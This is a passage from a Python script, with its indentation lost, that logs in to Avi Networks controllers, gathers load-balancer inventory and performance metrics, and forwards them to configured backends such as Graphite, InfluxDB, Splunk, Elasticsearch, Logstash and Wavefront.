resp = requests.post('%s://%s:%s/%s/_doc' %(endpoint_info['protocol'],endpoint_info['server'], endpoint_info['server_port'], endpoint_info['index']) ,headers = headers, data=json.dumps(entry), timeout=15, auth=(endpoint_info['username'],endpoint_info['password']))
else:
resp = requests.post('%s://%s:%s/%s/_doc' %(endpoint_info['protocol'],endpoint_info['server'], endpoint_info['server_port'], endpoint_info['index']) ,headers = headers, data=json.dumps(entry), timeout=15)
if resp.status_code != 201:
print(resp.text)
except:
exception_text = traceback.format_exc()
print(exception_text)
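# For reference, each document indexed above looks roughly like this (field names beyond
# metric_name/metric_value/avicontroller depend on the entry and are illustrative):
#   {"metric_name": "l4_client.avg_bandwidth", "metric_value": 123.0,
#    "avicontroller": "avi-cluster-name", "<timestamp-field>": "2019-12-20T10:00:00"}
# where the timestamp field name is taken from endpoint_info['timestamp'].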
#----- Send value to graphite
def send_value_graphite(endpoint_info, graphite_payload):
try:
message_list = []
name_space_prefix = 'network-script||'
for entry in graphite_payload:
if 'name_space' in entry:
name_space = (name_space_prefix+entry['name_space']).replace('.','_').replace('||','.').replace(' ','_')
#----- used for migration from old script
if 'host_location' in entry and 'host_environment' in entry:
name_space = name_space.replace('avi.', 'avi.'+entry['host_location']+'.'+entry['host_environment']+'.')
message_list.append('%s %f %d' %(name_space, entry['metric_value'], entry['timestamp']))
#----- I believe there is a message list limit on graphite for plain text
if sys.getsizeof(message_list) > 4915:
message = '\n'.join(message_list) + '\n'
socket.setdefaulttimeout(10)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((endpoint_info['server'], endpoint_info['server_port']))
sock.send(message.encode())
sock.close()
message_list = []
if len(message_list) > 0:
message = '\n'.join(message_list) + '\n'
socket.setdefaulttimeout(10)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((endpoint_info['server'], endpoint_info['server_port']))
sock.send(message.encode())
sock.close()
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
print(message)
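# For reference, each plaintext line sent above has the form '<metric.path> <value> <epoch>'.
# Illustrative example, after '||' separators are rewritten to '.' and '.'/' ' to '_':
#   network-script.avi.cluster-name.l4_client_avg_bandwidth 123.000000 1576800000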
#----- Send value to influxdb
def send_value_influxdb(endpoint_info, influx_payload):
try:
tag_to_ignore = ['metric_name', 'timestamp', 'metric_value','name_space']
if endpoint_info.get('metric_prefix') == None:
metric_prefix = ''
else:
metric_prefix = endpoint_info['metric_prefix']
message_list = []
auth_enabled = False
if 'auth-enabled' in endpoint_info:
if str(endpoint_info['auth-enabled']).lower() == 'true':
auth_enabled = True
for entry in influx_payload:
tag_list=[]
for k in entry:
if k not in tag_to_ignore:
tag_list.append((k+'='+entry[k]).replace(' ', '\\'))
tag_list = ','.join(tag_list)
temp_payload='%s%s,%s value=%f' %(metric_prefix, entry['metric_name'],tag_list,entry['metric_value'])
message_list.append(temp_payload)
if sys.getsizeof(message_list) > 4915:
message = '\n'.join(message_list) + '\n'
headers = ({'content-type': 'octet-stream'})
if auth_enabled == True:
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15, auth=(endpoint_info['username'],endpoint_info['password']))
message_list = []
else:
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15)
message_list = []
if resp.status_code == 401:
print(str(datetime.now())+' '+endpoint_info['server']+': UNAUTHORIZED')
elif resp.status_code == 403:
print(str(datetime.now())+' '+endpoint_info['server']+': FORBIDDEN')
message = '\n'.join(message_list) + '\n'
headers = ({'content-type': 'octet-stream'})
if auth_enabled == True:  # use the flag computed above to avoid a KeyError when 'auth-enabled' is absent
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15, auth=(endpoint_info['username'],endpoint_info['password']))
else:
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15)
if resp.status_code == 401:
print(str(datetime.now())+' '+endpoint_info['server']+': UNAUTHORIZED')
elif resp.status_code == 403:
print(str(datetime.now())+' '+endpoint_info['server']+': FORBIDDEN')
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to logstash
def send_value_logstash(endpoint_info, payload):
try:
keys_to_remove = ['name_space','timestamp']
proto = 'udp'
if endpoint_info.get('protocol') != None:
if endpoint_info['protocol'].lower() == 'tcp':
proto = 'tcp'
if proto == 'udp':
for entry in payload:
udpsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for k in keys_to_remove:
entry.pop(k,None)
message = '\n'+(json.dumps(entry))+'\n'
udpsock.sendto(message.encode(),(endpoint_info['server'],endpoint_info['server_port']))
udpsock.close()
else:
message_list = []
socket.setdefaulttimeout(10)
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.connect((endpoint_info['server'], endpoint_info['server_port']))
for entry in payload:
for k in keys_to_remove:
entry.pop(k,None)
message_list.append(json.dumps(entry))
if sys.getsizeof(message_list) > 1450:
message = '\n'.join(message_list) + '\n'
tcpsock.send(message.encode())
message_list = []
message = '\n'.join(message_list) + '\n'
tcpsock.send(message.encode())
tcpsock.close()
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to splunk HEC - destination is a metric index
def send_value_splunk_hec_metric(endpoint_info, splunk_payload):
try:
splunk_payload_template = {
"source": "avi",
"event" : "metric",
"index": endpoint_info['index'],
"time": "",
"host": "",
"fields": {
"service": "avi",
"environment": "",
"_value": "",
"location": "",
"metric_name": ""
}
}
hec_token = endpoint_info['hec_token']
headers = ({'Authorization': 'Splunk '+hec_token})
for entry in splunk_payload:
temp_entry = entry
keys_to_remove=["location","environment","avicontroller","timestamp","metric_value","metric_name","name_space"]
payload = json.loads(json.dumps(splunk_payload_template))  # deep copy so the nested 'fields' dict is not shared across entries
payload['host'] = temp_entry['avicontroller']
payload['time'] = temp_entry['timestamp']
payload['fields']['environment'] = temp_entry['environment']
payload['fields']['location'] = temp_entry['location']
payload['fields']['_value'] = temp_entry['metric_value']
payload['fields']['metric_name'] = temp_entry['metric_name']
for k in keys_to_remove:
entry.pop(k, None)
for e in entry:
payload["fields"][e]=entry[e]
resp = requests.post('%s://%s:%s/services/collector/event' %(endpoint_info['hec_protocol'], endpoint_info['server'], str(endpoint_info['hec_port'])) , verify=False, headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code == 400:
print(payload)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
print(entry)
#----- Send value to splunk HEC
def send_value_splunk_hec(endpoint_info, splunk_payload):
try:
splunk_payload_template = {
#"source": "",
"time": "",
"host": "",
"index": endpoint_info['index'],
"sourcetype": "avi:metrics",
"event": {
"avi_controller": ""
}
}
hec_token = endpoint_info['hec_token']
headers = ({'Authorization': 'Splunk '+hec_token})
for entry in splunk_payload:
temp_entry = entry
keys_to_remove=["avicontroller","name_space"]
payload = json.loads(json.dumps(splunk_payload_template))  # deep copy so the nested 'event' dict is not shared across entries
payload['host'] = temp_entry['avicontroller']
#payload['source'] = temp_entry['avicontroller']
payload['time'] = temp_entry['timestamp']
payload['sourcetype'] = 'avi:metrics'
payload['event']['avi_controller'] = temp_entry['avicontroller']
for k in keys_to_remove:
entry.pop(k, None)
for e in entry:
payload["event"][e]=entry[e]
resp = requests.post('%s://%s:%s/services/collector/event' %(endpoint_info['hec_protocol'], endpoint_info['server'], str(endpoint_info['hec_port'])) , verify=False, headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code == 400:
print(resp.text)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
print(entry)
def send_value_wavefront(endpoint_info, payload):
try:
keys_to_remove = ['name_space','timestamp','metric_name','metric_value']
message_list = []
if endpoint_info.get('api_key') != None:
wf_key = endpoint_info['api_key']
wf_proxy = False
else:
wf_proxy = True
if 'proxy_port' in endpoint_info:
wf_proxy_port = endpoint_info['proxy_port']
else:
wf_proxy_port = 2878
wf_instance = endpoint_info['instance']
for m in payload:
tag_list = []
metric_name = m['metric_name']
metric_value = m['metric_value']
for r in keys_to_remove:
m.pop(r, None)
for k,v in m.items():
tag_list.append(k+'="'+v+'"')
tag_list = (' '.join(tag_list))
metric = '%s %f source=%s %s' %(metric_name, metric_value, m['avicontroller'], tag_list)
message_list.append(metric)
message = '\n'.join(message_list)
if wf_proxy == False:
headers = ({'Authorization': 'Bearer '+wf_key, 'content-type': 'application/x-www-form-urlencoded'})
resp = requests.post('https://'+wf_instance+'/report', verify=False, headers = headers, data=message, timeout=15)
if resp.status_code != 202:
print('======> ERROR: send_to_wavefront', resp.status_code, resp.text)
#else:
# print(str(datetime.now())+' ======> Metrics sent to wavefront')
else:
try:
socket.setdefaulttimeout(10)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((wf_instance, wf_proxy_port))
sock.send(message.encode())
sock.close()
#print(str(datetime.now())+' ======> Metrics sent to wavefront')
except:
print(str(datetime.now())+' =====> ERROR: func send_to_wavefront encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
except:
exception_text = traceback.format_exc()
print(exception_text)
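# For reference, each line sent above follows the Wavefront data format
# '<metricName> <metricValue> source=<source> <tagKey>="<tagValue>" ...', with one tag pair per
# remaining entry field. Illustrative example:
#   l4_client.avg_bandwidth 123.000000 source=avi-cluster-name tenant="admin"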
#---------------------------------
def send_metriclist_to_endpoint(endpoint_list, payload):
try:
if endpoint_list != None:
for endpoint_info in endpoint_list:
if endpoint_info['type'] == 'graphite':
send_value_graphite(endpoint_info, payload)
elif endpoint_info['type'] == 'splunk':
if endpoint_info['index_type'].lower() == 'metric':
send_value_splunk_hec_metric(endpoint_info, payload)
else:
send_value_splunk_hec(endpoint_info, payload)
elif endpoint_info['type'] == 'appdynamics_http':
send_value_appdynamics_http(endpoint_info, payload)
elif endpoint_info['type'] == 'appdynamics_machine':
send_value_appdynamics_machine(endpoint_info, payload)
elif endpoint_info['type'] == 'datadog':
send_value_datadog(endpoint_info, payload)
elif endpoint_info['type'] == 'influxdb':
send_value_influxdb(endpoint_info, payload)
elif endpoint_info['type'] == 'logstash':
send_value_logstash(endpoint_info, payload)
elif endpoint_info['type'] == 'elasticsearch':
send_value_elasticsearch(endpoint_info, payload)
elif endpoint_info['type'] == 'wavefront':
send_value_wavefront(endpoint_info, payload)
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Determine Metrics Endpoint Type Info
def determine_endpoint_type(configuration):
endpoint_types = [
'graphite',
'appdynamics_http',
'appdynamics_machine',
'splunk',
'datadog',
'influxdb',
'logstash',
'elasticsearch',
'wavefront'
]
endpoint_list = []
for a in configuration:
if a['type'].lower() in endpoint_types and a['enable'] == True:
endpoint_info = a
endpoint_info['type'] = a['type'].lower()
endpoint_list.append(endpoint_info)
if len(endpoint_list) == 0:
print('=====> No endpoint will be used')
print(endpoint_list)
return endpoint_list
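# Illustrative configuration entry for the list passed to determine_endpoint_type (values are
# placeholders; the keys follow what the sender functions above expect), e.g. in the YAML config:
#   - type: influxdb
#     enable: true
#     protocol: http
#     server: metrics.example.com
#     server_port: 8086
#     db: avi
#     auth-enabled: false
#     metric_prefix: ''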
#---------------------------------------------------------------
#---------------- Metrics Endpoint functions END ---------------
#---------------------------------------------------------------
#----- This function allows for passwords to be either plaintext or base64 encoded
def isBase64(password):
try:
if base64.b64encode(base64.b64decode(password)).decode('utf-8') == password:
if all(ord(c) < 128 for c in base64.b64decode(password).decode('utf-8')):
return base64.b64decode(password).decode('utf-8')
else:
return password
else:
return password
except Exception:
return password
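# Illustrative behaviour sketch:
#   isBase64('YWRtaW4xMjM=')  ->  'admin123'      (valid base64 of ASCII text is decoded)
#   isBase64('not base64!!')  ->  'not base64!!'  (anything that fails to round-trip is returned as-is)
# Note that a plaintext password which happens to be valid base64 of printable ASCII will be decoded,
# so base64-encoding credentials in the configuration is the safer convention.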
#----- This class is where all the test methods/functions exist and are executed
class avi_metrics():
def __init__(self,avi_controller,avi_cluster_name, avi_user, avi_pass, controller_config):
self.avi_cluster_ip = avi_controller
self.avi_cluster_name = avi_cluster_name
self.avi_user = avi_user
self.avi_pass = avi_pass
self.controller_config = controller_config
#------ Default Metric Payload Template
self.payload_template = {}
#self.payload_template['location'] = self.host_location
#self.payload_template['environment'] = self.host_environment
self.payload_template['avicontroller'] = self.avi_cluster_name
if controller_config.get('tags') != None:
for k,v in controller_config['tags'].items():
self.payload_template[k] = v
if controller_config.get('metrics_endpoint_config') == None:
if global_endpoint_config != None:
self.endpoint_list = determine_endpoint_type(global_endpoint_config)
else:
self.endpoint_list = determine_endpoint_type([])
else:
self.endpoint_list = determine_endpoint_type(controller_config['metrics_endpoint_config'])
#------
if 'virtualservice_stats_config' in controller_config and controller_config.get('virtualservice_stats_config').get('virtualservice_realtime') == True:
self.vs_realtime = True
else:
self.vs_realtime = False
if 'serviceengine_stats_config' in controller_config and controller_config.get('serviceengine_stats_config').get('serviceengine_realtime') == True:
self.se_realtime = True
else:
self.se_realtime = False
if 'pool_stats_config' in controller_config and controller_config.get('pool_stats_config').get('pool_realtime') == True:
self.pool_realtime = True
else:
self.pool_realtime = False
#------
if 'virtualservice_stats_config' in controller_config and controller_config.get('virtualservice_stats_config').get('virtualservice_runtime') == True:
self.vs_runtime = True
else:
self.vs_runtime = False
if 'serviceengine_stats_config' in controller_config and controller_config.get('serviceengine_stats_config').get('serviceengine_runtime') == True:
self.se_runtime = True
else:
self.se_runtime = False
if 'pool_stats_config' in controller_config and controller_config.get('pool_stats_config').get('pool_runtime') == True:
self.pool_runtime = True
else:
self.pool_runtime = False
if 'controller_stats_config' in controller_config and controller_config.get('controller_stats_config').get('controller_runtime') == True:
self.controller_runtime = True
else:
self.controller_runtime = False
#------ PRINT CONFIGURATION ------
print('-------------------------------------------------------------------')
print('============ CONFIGURATION FOR: '+avi_cluster_name+':'+self.avi_cluster_ip+ ' ============')
if 'virtualservice_stats_config' in controller_config and controller_config.get('virtualservice_stats_config').get('virtualservice_metrics') == True:
self.vs_metrics = True
print('VIRTUALSERVICE METRICS: True')
else:
self.vs_metrics = False
print('VIRTUALSERVICE METRICS: False')
print('VIRTUALSERVICE REALTIME METRICS: ' +str(self.vs_realtime))
print('VIRTUALSERVICE RUNTIME: '+str(self.vs_runtime))
#------
if 'serviceengine_stats_config' in controller_config and controller_config.get('serviceengine_stats_config').get('serviceengine_metrics') == True:
self.se_metrics = True
print('SERVICEENGINE METRICS: True')
else:
self.se_metrics = False
print('SERVICEENGINE METRICS: False')
print('SERVICEENGINE REALTIME METRICS: ' +str(self.se_realtime))
print('SERVICEENGINE RUNTIME: '+str(self.se_runtime))
#------
if 'pool_stats_config' in controller_config and controller_config.get('pool_stats_config').get('pool_metrics') == True:
self.pool_metrics = True
print('POOL METRICS: True')
else:
self.pool_metrics = False
print('POOL METRICS: False')
print('POOL REALTIME METRICS: ' +str(self.pool_realtime))
print('POOL RUNTIME: '+str(self.pool_runtime))
#------
if 'controller_stats_config' in controller_config and controller_config.get('controller_stats_config').get('controller_metrics') == True:
self.controller_metrics = True
print('CONTROLLER METRICS: True')
else:
self.controller_metrics = False
print('CONTROLLER METRICS: False')
print('CONTROLLER RUNTIME: '+str(self.controller_runtime))
print('-------------------------------------------------------------------')
print('-------------------------------------------------------------------')
#------
self.vs_metric_list = [
'l4_client.apdexc',
'l4_client.avg_bandwidth',
'l4_client.avg_application_dos_attacks',
'l4_client.avg_complete_conns',
'l4_client.avg_connections_dropped',
'l4_client.avg_new_established_conns',
'l4_client.avg_policy_drops',
'l4_client.avg_rx_pkts',
'l4_client.avg_tx_pkts',
'l4_client.avg_rx_bytes',
'l4_client.avg_tx_bytes',
'l4_client.max_open_conns',
'l4_client.avg_lossy_connections',
'l7_client.avg_complete_responses',
'l7_client.avg_client_data_transfer_time',
'l7_client.avg_client_txn_latency',
'l7_client.sum_application_response_time',
'l7_client.avg_resp_4xx_avi_errors',
'l7_client.avg_resp_5xx_avi_errors',
'l7_client.avg_resp_2xx',
'l7_client.avg_resp_4xx',
'l7_client.avg_resp_5xx',
'l4_client.avg_total_rtt',
'l7_client.avg_page_load_time',
'l7_client.apdexr',
'l7_client.avg_ssl_handshakes_new',
'l7_client.avg_ssl_connections',
'l7_client.sum_get_reqs',
'l7_client.sum_post_reqs',
'l7_client.sum_other_reqs',
'l7_client.avg_frustrated_responses',
'l7_client.avg_waf_attacks',
'l7_client.pct_waf_attacks',
'l7_client.sum_total_responses',
'l7_client.avg_waf_rejected',
'l7_client.avg_waf_evaluated',
'l7_client.avg_waf_matched',
'l7_client.avg_waf_disabled',
'l7_client.pct_waf_disabled',
'l7_client.avg_http_headers_count',
'l7_client.avg_http_headers_bytes',
'l7_client.pct_get_reqs',
'l7_client.pct_post_reqs',
'l7_client.avg_http_params_count',
'l7_client.avg_uri_length',
'l7_client.avg_post_bytes',
'dns_client.avg_complete_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_tcp_queries',
'dns_client.avg_udp_queries',
'dns_client.avg_udp_passthrough_resp_time',
'dns_client.avg_unsupported_queries',
'dns_client.pct_errored_queries',
'dns_client.avg_domain_lookup_failures',
'dns_client.avg_avi_errors',
'dns_server.avg_complete_queries',
'dns_server.avg_errored_queries',
'dns_server.avg_tcp_queries',
'dns_server.avg_udp_queries',
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
#------
self.se_metric_list = [
'se_if.avg_bandwidth',
'se_stats.avg_connection_mem_usage',
'se_stats.avg_connections',
'se_stats.avg_connections_dropped',
'se_stats.avg_cpu_usage',
'se_stats.avg_disk1_usage',
'se_stats.avg_mem_usage',
'se_stats.avg_dynamic_mem_usage',
'se_stats.avg_persistent_table_usage',
'se_stats.avg_rx_bandwidth',
'se_if.avg_rx_bytes',
'se_if.avg_rx_pkts',
'se_if.avg_rx_pkts_dropped_non_vs',
'se_if.avg_tx_pkts',
'se_if.avg_tx_bytes',
'se_stats.avg_ssl_session_cache_usage',
'se_if.avg_connection_table_usage',
'se_stats.max_se_bandwidth',
'se_stats.avg_eth0_bandwidth',
'se_stats.pct_syn_cache_usage',
'se_stats.avg_packet_buffer_usage',
'se_stats.avg_packet_buffer_header_usage',
'se_stats.avg_packet_buffer_large_usage',
'se_stats.avg_packet_buffer_small_usage',
'healthscore.health_score_value'
]
#------
self.controller_metric_list = [
'controller_stats.avg_cpu_usage',
'controller_stats.avg_disk_usage',
'controller_stats.avg_mem_usage']
#----
self.pool_server_metric_list = [
'l4_server.avg_rx_pkts',
'l4_server.avg_tx_pkts',
'l4_server.avg_rx_bytes',
'l4_server.avg_tx_bytes',
'l4_server.avg_bandwidth',
'l7_server.avg_complete_responses',
'l4_server.avg_new_established_conns',
'l4_server.avg_pool_open_conns',
'l4_server.avg_pool_complete_conns',
'l4_server.avg_open_conns',
'l4_server.max_open_conns',
'l4_server.avg_errored_connections',
'l4_server.apdexc',
'l4_server.avg_total_rtt',
'l7_server.avg_resp_latency',
'l7_server.apdexr',
'l7_server.avg_application_response_time',
'l7_server.pct_response_errors',
'l7_server.avg_frustrated_responses',
'l7_server.avg_total_requests',
'healthscore.health_score_value'
]
def avi_login(self):
try:
login = pickle.load(open((os.path.join(fdir,self.avi_cluster_ip)),'rb'))
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "admin", 'content-type': 'application/json'})
resp = requests.get('https://%s/api/cluster' %self.avi_cluster_ip, verify=False, headers = headers,cookies=cookies,timeout=5)
if resp.status_code == 200:
return login
else:
login = requests.post('https://%s/login' %self.avi_cluster_ip, verify=False, data={'username': self.avi_user, 'password': self.avi_pass},timeout=15)
pickle.dump(login, open((os.path.join(fdir,self.avi_cluster_ip)),'wb'))
return login
except:
try:
login = requests.post('https://%s/login' %self.avi_cluster_ip, verify=False, data={'username': self.avi_user, 'password': self.avi_pass},timeout=15)
pickle.dump(login, open((os.path.join(fdir,self.avi_cluster_ip)),'wb'))
return login
except requests.exceptions.Timeout:
class timedout:pass
login = timedout()
login.status_code = 'timedout'
return login
def avi_request(self,avi_api,tenant,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in self.login.cookies.keys():
cookies['avi-sessionid'] = self.login.cookies['avi-sessionid']
else:
cookies['sessionid'] = self.login.cookies['sessionid']
headers = ({'X-Avi-Tenant': '%s' %tenant, 'content-type': 'application/json', 'X-Avi-Version': '%s' %api_version})
return requests.get('https://%s/api/%s' %(self.avi_controller,avi_api), verify=False, headers = headers,cookies=cookies,timeout=50)
def avi_post(self,api_url,tenant,payload,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in self.login.cookies.keys():
cookies['avi-sessionid'] = self.login.cookies['avi-sessionid']
else:
cookies['sessionid'] = self.login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "%s" %tenant, 'content-type': 'application/json','referer': 'https://%s' %self.avi_controller, 'X-CSRFToken': dict(self.login.cookies)['csrftoken'],'X-Avi-Version':'%s' %api_version})
cookies['csrftoken'] = self.login.cookies['csrftoken']
return requests.post('https://%s/api/%s' %(self.avi_controller,api_url), verify=False, headers = headers,cookies=cookies, data=json.dumps(payload),timeout=50)
#----- Tries to determine a follower controller to poll
def controller_to_poll(self):
cookies=dict()
if 'avi-sessionid' in self.login.cookies.keys():
cookies['avi-sessionid'] = self.login.cookies['avi-sessionid']
else:
cookies['sessionid'] = self.login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "admin", 'content-type': 'application/json'})
resp = (requests.get('https://%s/api/%s' %(self.avi_cluster_ip,'cluster/runtime'), verify=False, headers = headers,cookies=cookies,timeout=50)).json()
follower_list = []
if len(resp['node_states']) > 1:
for c in resp['node_states']:
if c['state'] == 'CLUSTER_ACTIVE' and c['role'] == 'CLUSTER_FOLLOWER':
follower_list.append(c['mgmt_ip'])
if len(follower_list) == 0:
return self.avi_cluster_ip
else:
return sorted(follower_list)[0]
else:
return self.avi_cluster_ip
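# Note: when the cluster has active followers, the lowest follower IP is polled (presumably to keep
# the metrics queries off the cluster leader); otherwise the configured cluster IP is used.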
#----- Creates inventory dicts to be used by other methods
def gen_inventory_dict(self):
try:
start_time = time.time()
#------
vs_dict = {}
se_dict = {}
pool_dict = {}
seg_dict = {}
#------
if self.vs_runtime == True:
vs_runtime = '&join_subresources=runtime'
else:
vs_runtime = ''
if self.se_runtime == True:
se_runtime = '&join_subresources=runtime'
else:
se_runtime = ''
#------
for t in self.tenants:
if self.vs_metrics == True or self.vs_runtime == True:
vs_inv = self.avi_request('virtualservice?fields=cloud_ref,tenant_ref,se_group_ref&page_size=200&include_name=true&'+vs_runtime,t['name'])
if vs_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: virtualservice_inventory: %s' %vs_inv.text)
else:
vs_inv = vs_inv.json()
resp = vs_inv
page_number = 1
while 'next' in resp:
page_number += 1
resp = self.avi_request('virtualservice?fields=cloud_ref,tenant_ref,se_group_ref&page_size=200&include_name=true&page='+str(page_number)+vs_runtime,t['name']).json()
for v in resp['results']:
vs_inv['results'].append(v)
if vs_inv['count'] > 0:
for v in vs_inv['results']:
vs_dict[v['uuid']] = {}
vs_dict[v['uuid']]['name'] = v['name']
vs_dict[v['uuid']]['tenant'] = v['tenant_ref'].rsplit('#')[1]
vs_dict[v['uuid']]['cloud'] = v['cloud_ref'].rsplit('#')[1]
vs_dict[v['uuid']]['se_group'] = v['se_group_ref'].rsplit('#')[1]
vs_dict[v['uuid']]['results'] = v
#---------------
if self.se_metrics == True or self.se_runtime == True:
se_inv = self.avi_request('serviceengine?fields=cloud_ref,tenant_ref,se_group_ref,vs_refs&page_size=200&include_name=true'+se_runtime,t['name'])
if se_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: serviceengine_inventory: %s' %se_inv.text)
else:
se_inv = se_inv.json()
resp = se_inv
page_number = 1
while 'next' in resp:
page_number += 1
resp = self.avi_request('serviceengine?fields=cloud_ref,tenant_ref,se_group_ref,vs_refs&page_size=200&include_name=true&page='+str(page_number)+se_runtime,t['name']).json()
for s in resp['results']:
se_inv['results'].append(s)
if se_inv['count'] > 0:
for s in se_inv['results']:
se_dict[s['uuid']] = {}
se_dict[s['uuid']]['name'] = s['name']
se_dict[s['uuid']]['tenant'] = s['tenant_ref'].rsplit('#')[1]
se_dict[s['uuid']]['cloud'] = s['cloud_ref'].rsplit('#')[1]
se_dict[s['uuid']]['se_group'] = s['se_group_ref'].rsplit('#')[1]
se_dict[s['uuid']]['se_group_uuid'] = s['se_group_ref'].split('/serviceenginegroup/')[1].rsplit('#')[0]
se_dict[s['uuid']]['results'] = s
se_dict[s['uuid']]['virtualservices'] = []
if 'vs_refs' in s:
for v in s['vs_refs']:
se_dict[s['uuid']]['virtualservices'].append(v.rsplit('#',1)[1])
else:
se_dict[s['uuid']]['virtualservices'] = []
#---------------
if self.pool_metrics == True or self.pool_runtime == True:
pool_inv = self.avi_request('pool-inventory?include_name=true&page_size=200',t['name'])
if pool_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: pool_inventory: %s' %pool_inv.text)
else:
pool_inv = pool_inv.json()
resp = pool_inv
page_number = 1
while 'next' in resp:
page_number += 1
resp = self.avi_request('pool-inventory?include_name=true&page_size=200&page='+str(page_number),t['name']).json()
for p in resp['results']:
pool_inv['results'].append(p)
if pool_inv['count'] > 0:
for p in pool_inv['results']:
pool_dict[p['uuid']] = {}
pool_dict[p['uuid']]['name'] = p['config']['name']
pool_dict[p['uuid']]['tenant'] = p['config']['tenant_ref'].rsplit('#')[1]
pool_dict[p['uuid']]['cloud'] = p['config']['cloud_ref'].rsplit('#')[1]
pool_dict[p['uuid']]['results'] = p
#---------------
seg_inv = self.avi_request('serviceenginegroup?fields=max_vs_per_se,cloud_ref,tenant_ref&include_name&page_size=200',t['name'])
if seg_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR: serviceengine_group_inventory: %s' %seg_inv.text)
else:
seg_inv = seg_inv.json()
if seg_inv['count'] > 0:
for seg in seg_inv['results']:
seg_dict[seg['uuid']] = {}
seg_dict[seg['uuid']]['name'] = seg['name']
seg_dict[seg['uuid']]['cloud'] = seg['cloud_ref'].rsplit('#')[1]
seg_dict[seg['uuid']]['tenant'] = seg['tenant_ref'].rsplit('#')[1]
seg_dict[seg['uuid']]['max_vs_per_se'] = seg['max_vs_per_se']
seg_dict[seg['uuid']]['results'] = seg
temp_total_time = str(time.time()-start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func gen_inventory_dict completed, executed in '+temp_total_time+' seconds')
return vs_dict, se_dict, pool_dict, seg_dict
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func gen_inventory_dict encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
sys.exit(1)
#-----------------------------------
#----- Remove unavailable metrics for current version
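    #----- Pulls analytics/metric_id to learn which metric names this controller version
    #----- supports, filters the configured (or default) VS/SE/controller/pool metric lists
    #----- against it, and returns each list as a comma-separated string.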
def remove_version_specific_metrics(self):
try:
#----- Generate List of Available Metrics
available_metrics = {}
resp = self.avi_request('analytics/metric_id',self.tenants[0]['name']).json()
vs_metrics = []
se_metrics = []
pool_server_metrics = []
controller_metrics = []
for m in resp['results']:
available_metrics[m['name']]=m['entity_types']
if 'virtualservice_stats_config' in self.controller_config and self.controller_config.get('virtualservice_stats_config').get('virtualservice_metrics_list') != None:
for vm in self.controller_config['virtualservice_stats_config']['virtualservice_metrics_list']:
vm = vm.replace(' ','').lower()
if vm in available_metrics:
if 'virtualservice' in available_metrics[vm]:
vs_metrics.append(vm)
else:
for vm in self.vs_metric_list:
if vm in available_metrics:
if 'virtualservice' in available_metrics[vm]:
vs_metrics.append(vm)
#------
if 'serviceengine_stats_config' in self.controller_config and self.controller_config.get('serviceengine_stats_config').get('serviceengine_metrics_list') != None:
for sm in self.controller_config['serviceengine_stats_config']['serviceengine_metrics_list']:
sm = sm.replace(' ','').lower()
if sm in available_metrics:
if 'serviceengine' in available_metrics[sm]:
se_metrics.append(sm)
else:
for sm in self.se_metric_list:
if sm in available_metrics:
if 'serviceengine' in available_metrics[sm]:
se_metrics.append(sm)
#------
if 'controller_stats_config' in self.controller_config and self.controller_config.get('controller_stats_config').get('controller_metrics_list') != None:
for cm in self.controller_config['controller_stats_config']['controller_metrics_list']:
cm = cm.replace(' ','').lower()
if cm in available_metrics:
if 'cluster' in available_metrics[cm]:
controller_metrics.append(cm)
else:
for cm in self.controller_metric_list:
if cm in available_metrics:
if 'cluster' in available_metrics[cm]:
controller_metrics.append(cm)
#------
if 'pool_stats_config' in self.controller_config and self.controller_config.get('pool_stats_config').get('pool_metrics_list') != None:
